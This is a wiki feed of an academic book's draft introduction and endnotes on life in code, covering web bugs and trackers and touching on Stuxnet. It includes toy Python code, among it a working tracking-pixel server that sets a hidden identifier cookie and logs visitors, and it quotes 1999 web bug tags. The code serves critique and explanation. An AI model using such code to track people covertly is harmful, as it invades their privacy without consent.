[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks but, unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm does this by taking advantage of the file or information transport features of a computer, such as its networking setup, which it exploits in order to travel from computer to computer unaided. &lt;br /&gt;
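&lt;br /&gt;
The distinction can be illustrated with a deliberately abstract simulation (no real networking or exploitation is involved, and the four-host graph is invented): a worm propagates along network links unaided, whereas a virus moves only when a simulated human action, such as carrying a USB stick, transports it. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Deliberately abstract simulation of the worm/virus distinction. &lt;br /&gt;
# No real networking is involved; the host graph is invented. &lt;br /&gt;
from collections import deque &lt;br /&gt;
 &lt;br /&gt;
network = {"A": ["B", "C"], "B": ["D"], "C": ["D"], "D": []} &lt;br /&gt;
 &lt;br /&gt;
def worm_spread(start): &lt;br /&gt;
    """Worm: propagates along network links without human action.""" &lt;br /&gt;
    infected, frontier = {start}, deque([start]) &lt;br /&gt;
    while frontier: &lt;br /&gt;
        host = frontier.popleft() &lt;br /&gt;
        for peer in network[host]: &lt;br /&gt;
            if peer not in infected: &lt;br /&gt;
                infected.add(peer) &lt;br /&gt;
                frontier.append(peer) &lt;br /&gt;
    return infected &lt;br /&gt;
 &lt;br /&gt;
def virus_spread(start, human_actions): &lt;br /&gt;
    """Virus: moves only when a human action (a USB stick, say) carries it.""" &lt;br /&gt;
    infected = {start} &lt;br /&gt;
    for src, dst in human_actions:  # e.g. [("A", "C"), ("C", "D")] &lt;br /&gt;
        if src in infected: &lt;br /&gt;
            infected.add(dst) &lt;br /&gt;
    return infected &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;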
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enrichment process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, a coinage that draws the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4693</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4693"/>
		<updated>2012-04-18T12:23:23Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, although it remains within the purview of humans to seek to understand this delegated agency. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ‘ecology’ in ‘computational ecology’ here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This highly mediated existence has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
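&lt;br /&gt;
To illustrate the mechanism at stake (see also note [2]), here is a minimal sketch of the server side of a web bug: an endpoint that returns a one-pixel GIF, sets a unique identifier cookie on first sight, and logs every subsequent request. It is a toy written under illustrative assumptions, not the code of any actual tracking service. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Toy server side of a web bug: returns a 1x1 GIF, sets an ID cookie on &lt;br /&gt;
# first sight, and logs each request. Illustrative assumptions only. &lt;br /&gt;
import uuid &lt;br /&gt;
from http.cookies import SimpleCookie &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
 &lt;br /&gt;
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff" &lt;br /&gt;
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01" &lt;br /&gt;
         b"\x00\x00\x02\x02D\x01\x00;")  # a minimal transparent GIF &lt;br /&gt;
 &lt;br /&gt;
class Bug(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        cookies = SimpleCookie(self.headers.get("Cookie", "")) &lt;br /&gt;
        uid = cookies["uid"].value if "uid" in cookies else str(uuid.uuid4()) &lt;br /&gt;
        # the 'log': tracking ID, referring page and browser, per request &lt;br /&gt;
        print(uid, self.headers.get("Referer"), self.headers.get("User-Agent")) &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        self.send_header("Content-Type", "image/gif") &lt;br /&gt;
        self.send_header("Set-Cookie", f"uid={uid}; Max-Age=31536000") &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(PIXEL) &lt;br /&gt;
 &lt;br /&gt;
if __name__ == "__main__": &lt;br /&gt;
    HTTPServer(("", 8000), Bug).serve_forever() &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;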
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
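&lt;br /&gt;
To give a flavour of what such obfuscation looks like, the two functions below compute the same thing; the second has simply been mechanically renamed and compressed, in the manner of minified tracking scripts. This is a toy example, not code from any actual web bug. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# The same computation twice: readable, then mechanically obfuscated. &lt;br /&gt;
def average_session_time(durations): &lt;br /&gt;
    """Readable: the mean of a list of session durations.""" &lt;br /&gt;
    return sum(durations) / len(durations) if durations else 0.0 &lt;br /&gt;
 &lt;br /&gt;
_0x3f = lambda _0x1a: _0x1a and sum(_0x1a) / len(_0x1a) or 0.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;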
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
